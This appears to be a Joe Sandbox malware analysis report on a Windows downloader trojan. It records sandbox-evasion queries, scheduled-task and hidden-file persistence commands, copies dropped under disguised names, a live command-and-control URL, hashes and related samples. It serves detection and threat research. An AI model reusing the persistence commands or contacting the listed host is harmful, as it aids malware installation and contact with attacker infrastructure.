                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            Source: Yara match, File source: Process Memory Space: 3u8A2xjbBT.exe PID: 6464, type: MEMORYSTR
                            Source: Yara match, File source: Process Memory Space: 3u8A2xjbBT.exe PID: 2908, type: MEMORYSTR
                            Source: Yara match, File source: Process Memory Space: 3u8A2xjbBT.exe PID: 4704, type: MEMORYSTR
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe Code function: 15_2_05832D40 sldt word ptr [eax]
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe Thread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe Window / User API: threadDelayed 2839
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe Window / User API: threadDelayed 6938
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe Window / User API: threadDelayed 7034
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe Window / User API: threadDelayed 2753
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe Window / User API: threadDelayed 4397
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe Window / User API: threadDelayed 5383
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -32658s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -32533s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe TID: 6136Thread sleep time: -32408s >= -30000s
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                            Source: 3u8A2xjbBT.exe, 00000000.00000002.3716578123.000000000BA67000.00000004.00000020.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3716378962.000000000A222000.00000004.00000020.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3715570746.000000000A86C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe Process token adjusted: Debug
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe Memory allocated: page read and write | page guard
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "3u8A2xjbBT"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "3u8A2xjbBT" /tr "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe Process created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe Process created: unknown unknown
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe Queries volume information: C:\Users\user\Desktop\3u8A2xjbBT.exe VolumeInformation
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                            Stealing of Sensitive Information

                            Source: Yara match File source: dump.pcap, type: PCAP
                            Source: Yara match File source: 16.2.3u8A2xjbBT.exe.3039c04.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match, File source: Process Memory Space: 3u8A2xjbBT.exe PID: 6464, type: MEMORYSTR
                            Source: Yara match, File source: Process Memory Space: 3u8A2xjbBT.exe PID: 2908, type: MEMORYSTR
                            Source: Yara match, File source: Process Memory Space: 3u8A2xjbBT.exe PID: 4704, type: MEMORYSTR

                            Remote Access Functionality

                            Source: Yara match, File source: dump.pcap, type: PCAP
                            Source: Yara match, File source: 16.2.3u8A2xjbBT.exe.3039c04.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara match, File source: Process Memory Space: 3u8A2xjbBT.exe PID: 6464, type: MEMORYSTR
                            Source: Yara match, File source: Process Memory Space: 3u8A2xjbBT.exe PID: 2908, type: MEMORYSTR
                            Source: Yara match, File source: Process Memory Space: 3u8A2xjbBT.exe PID: 4704, type: MEMORYSTR
                            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 Scheduled Task/Job | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 211 Security Software Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                            Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 2 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 1 Disable or Modify Tools | LSASS Memory | 151 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
                            Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 2 Registry Run Keys / Startup Folder | 151 Virtualization/Sandbox Evasion | Security Account Manager | 1 Application Window Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 11 Process Injection | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
                            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 123 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Software Packing | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                            [Behavior graph: ID 1545318, Sample: 3u8A2xjbBT.exe, Startdate: 30/10/2024, Architecture: WINDOWS, Score: 100]

                            Source | Detection | Scanner | Label | Link
                            3u8A2xjbBT.exe | 68% | ReversingLabs | Win32.Trojan.Strictor
                            3u8A2xjbBT.exe | 100% | Avira | DR/AVI.Agent.mrstb
                            3u8A2xjbBT.exe | 100% | Joe Sandbox ML
                            Source | Detection | Scanner | Label | Link
                            C:\Users\user\OneDrive\msbuild.exe | 100% | Avira | DR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\mozilla maintenance service.exe | 100% | Avira | DR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe | 100% | Avira | DR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\jdownloader.exe | 100% | Avira | DR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\msecache.exe | 100% | Avira | DR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\google.exe | 100% | Avira | DR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\windows mail.exe | 100% | Avira | DR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\common files.exe | 100% | Avira | DR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\java.exe | 100% | Avira | DR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\windows defender.exe | 100% | Avira | DR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\microsoft.net.exe | 100% | Avira | DR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\microsoft.exe | 100% | Avira | DR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\reference assemblies.exe | 100% | Avira | DR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\microsoft office.exe | 100% | Avira | DR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\internet explorer.exe | 100% | Avira | DR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\autoit3.exe | 100% | Avira | DR/AVI.Agent.mrstb
                            C:\Users\user\OneDrive\msbuild.exe | 100% | Joe Sandbox ML
                            C:\Users\user\OneDrive\mozilla maintenance service.exe | 100% | Joe Sandbox ML
                            C:\Users\user\OneDrive\uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe | 100% | Joe Sandbox ML
                            C:\Users\user\OneDrive\jdownloader.exe | 100% | Joe Sandbox ML
                            C:\Users\user\OneDrive\msecache.exe | 100% | Joe Sandbox ML
                            C:\Users\user\OneDrive\google.exe | 100% | Joe Sandbox ML
                            C:\Users\user\OneDrive\windows mail.exe | 100% | Joe Sandbox ML
                            C:\Users\user\OneDrive\common files.exe | 100% | Joe Sandbox ML
                            C:\Users\user\OneDrive\java.exe | 100% | Joe Sandbox ML
                            C:\Users\user\OneDrive\windows defender.exe | 100% | Joe Sandbox ML
                            C:\Users\user\OneDrive\microsoft.net.exe | 100% | Joe Sandbox ML
                            C:\Users\user\OneDrive\microsoft.exe | 100% | Joe Sandbox ML
                            C:\Users\user\OneDrive\reference assemblies.exe | 100% | Joe Sandbox ML
                            C:\Users\user\OneDrive\microsoft office.exe | 100% | Joe Sandbox ML
                            C:\Users\user\OneDrive\internet explorer.exe | 100% | Joe Sandbox ML
                            C:\Users\user\OneDrive\autoit3.exe | 100% | Joe Sandbox ML
                            C:\Users\user\OneDrive\autoit3.exe | 68% | ReversingLabs | Win32.Trojan.Strictor
                            C:\Users\user\OneDrive\common files.exe | 68% | ReversingLabs | Win32.Trojan.Strictor
                            C:\Users\user\OneDrive\google.exe | 68% | ReversingLabs | Win32.Trojan.Strictor
                            C:\Users\user\OneDrive\internet explorer.exe | 68% | ReversingLabs | Win32.Trojan.Strictor
                            C:\Users\user\OneDrive\java.exe | 68% | ReversingLabs | Win32.Trojan.Strictor
                            C:\Users\user\OneDrive\jdownloader.exe | 68% | ReversingLabs | Win32.Trojan.Strictor
                            C:\Users\user\OneDrive\microsoft office.exe | 68% | ReversingLabs | Win32.Trojan.Strictor
                            C:\Users\user\OneDrive\microsoft.exe | 68% | ReversingLabs | Win32.Trojan.Strictor
                            C:\Users\user\OneDrive\microsoft.net.exe | 68% | ReversingLabs | Win32.Trojan.Strictor
                            C:\Users\user\OneDrive\mozilla maintenance service.exe | 68% | ReversingLabs | Win32.Trojan.Strictor
                            C:\Users\user\OneDrive\msbuild.exe | 68% | ReversingLabs | Win32.Trojan.Strictor
                            C:\Users\user\OneDrive\msecache.exe | 68% | ReversingLabs | Win32.Trojan.Strictor
                            C:\Users\user\OneDrive\reference assemblies.exe | 68% | ReversingLabs | Win32.Trojan.Strictor
                            C:\Users\user\OneDrive\uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe | 68% | ReversingLabs | Win32.Trojan.Strictor
                            C:\Users\user\OneDrive\windows defender.exe | 68% | ReversingLabs | Win32.Trojan.Strictor
                            C:\Users\user\OneDrive\windows mail.exe | 68% | ReversingLabs | Win32.Trojan.Strictor
                            C:\Users\user\OneDrive\windows media player.exe | 68% | ReversingLabs | Win32.Trojan.Strictor
                            C:\Users\user\OneDrive\windows multimedia platform.exe | 68% | ReversingLabs | Win32.Trojan.Strictor
                            C:\Users\user\OneDrive\windows nt.exe | 68% | ReversingLabs | Win32.Trojan.Strictor
                            C:\Users\user\OneDrive\windows photo viewer.exe | 68% | ReversingLabs | Win32.Trojan.Strictor
                            C:\Users\user\OneDrive\windows portable devices.exe | 68% | ReversingLabs | Win32.Trojan.Strictor
                            C:\Users\user\OneDrive\windows sidebar.exe | 68% | ReversingLabs | Win32.Trojan.Strictor
                            C:\Users\user\OneDrive\windowspowershell.exe | 68% | ReversingLabs | Win32.Trojan.Strictor
                            No Antivirus matches
                            No Antivirus matches
                            Source | Detection | Scanner | Label | Link
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                            No contacted domains info
                            Name | Malicious | Antivirus Detection | Reputation
                            http://87.120.126.5/VmCetSC7/page.php | true | | unknown
                                    Name | Source | Malicious | Antivirus Detection | Reputation
                                    http://87.120.126.5 | 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003638000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003524000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003660000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003554000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003688000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002D22000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.0000000003120000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.000000000316D000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.0000000003132000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
                                    http://87.120.126.5/VmCetSC7/page.phpy | 3u8A2xjbBT.exe, 0000000F.00000002.3716378962.000000000A222000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 3u8A2xjbBT.exe, 00000000.00000002.3711597312.000000000347E000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.0000000003089000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                    http://87.120.126.5/VmCetSC7/page.phpP | 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003638000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003524000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003660000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.000000000347E000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003554000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003688000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002D22000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.000000000316D000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.0000000003089000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.0000000003132000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
                                    IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                    87.120.126.5 | unknown | Bulgaria | | 25206 | UNACS-AS-BG8000BurgasBG | true
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1545318
                                    Start date and time:2024-10-30 12:21:08 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 10m 48s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:64
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:3u8A2xjbBT.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:8391d3b5332c4b1164333ddce388a8c7.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.mine.winEXE@72/47@0/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 85%
                                    • Number of executed functions: 456
                                    • Number of non-executed functions: 36
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                    • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): www.bing.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                    • VT rate limit hit for: 3u8A2xjbBT.exe
                                    Time | Type | Description
                                    07:22:04 | API Interceptor | 9009766x Sleep call for process: 3u8A2xjbBT.exe modified
                                    13:50:52 | Task Scheduler | Run new task: 3u8A2xjbBT path: C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    13:50:53 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3u8A2xjbBT.lnk
                                    No context
                                    No context
                                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                    UNACS-AS-BG8000BurgasBG | CARDFACTORYAccess Program, Tuesday, October 29, 2024.eml | malicious | HTMLPhisher | 87.120.113.115
                                    UNACS-AS-BG8000BurgasBG | bLaLoo4ET5.exe | malicious | Quasar | 87.120.116.115
                                    UNACS-AS-BG8000BurgasBG | Transferencia.doc | malicious | Quasar | 87.120.116.115
                                    UNACS-AS-BG8000BurgasBG | 1XZFfxyWZA.exe | malicious | RedLine | 87.120.115.20
                                    UNACS-AS-BG8000BurgasBG | roquette October.pdf | malicious | HTMLPhisher | 87.120.126.33
                                    UNACS-AS-BG8000BurgasBG | roquette October.pdf | malicious | HTMLPhisher | 87.120.126.33
                                    UNACS-AS-BG8000BurgasBG | https://anviict.com/?qvtvxymb | malicious | HTMLPhisher | 87.120.125.203
                                    UNACS-AS-BG8000BurgasBG | t50.elf | malicious | Xmrig | 87.120.117.189
                                    UNACS-AS-BG8000BurgasBG | ctCDAy5OQc.exe | malicious | XenoRAT | 87.120.116.115
                                    UNACS-AS-BG8000BurgasBG | roze.sparc.elf | malicious | Gafgyt, Mirai | 87.120.112.102
                                    No context
                                    No context
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Thu Oct 5 06:54:39 2023, mtime=Wed Oct 30 10:22:06 2024, atime=Wed Oct 30 10:22:02 2024, length=213832, window=hide
                                    Category:dropped
                                    Size (bytes):663
                                    Entropy (8bit):5.092925576386894
                                    Encrypted:false
                                    SSDEEP:12:8misM1qzYNbRLnALoQCUjAUFSCGRct1ESkXIl5v3r3zBmV:8mi1TnL6AiS9R017v3r3tm
                                    MD5:8761D28FA3DD17C7261A3FFCA6125C3B
                                    SHA1:6E4DE23D1FD6E109B2B71FD4B979EFA209F39F52
                                    SHA-256:967861420CDBA7EDCF1455316C05692A410A61F5EBEC9D909D1015A0026A812E
                                    SHA-512:1411416F58BF17CA2A9EE20CF65231BF3F29A687D6F8BAEFB1F27F0E2D224993E5D264B960BCD8C4CED32C6FC190D766A4E9597ED42DEE30A813CB3DF2591669
                                    Malicious:false
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\autoit3.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\common files.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:modified
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0
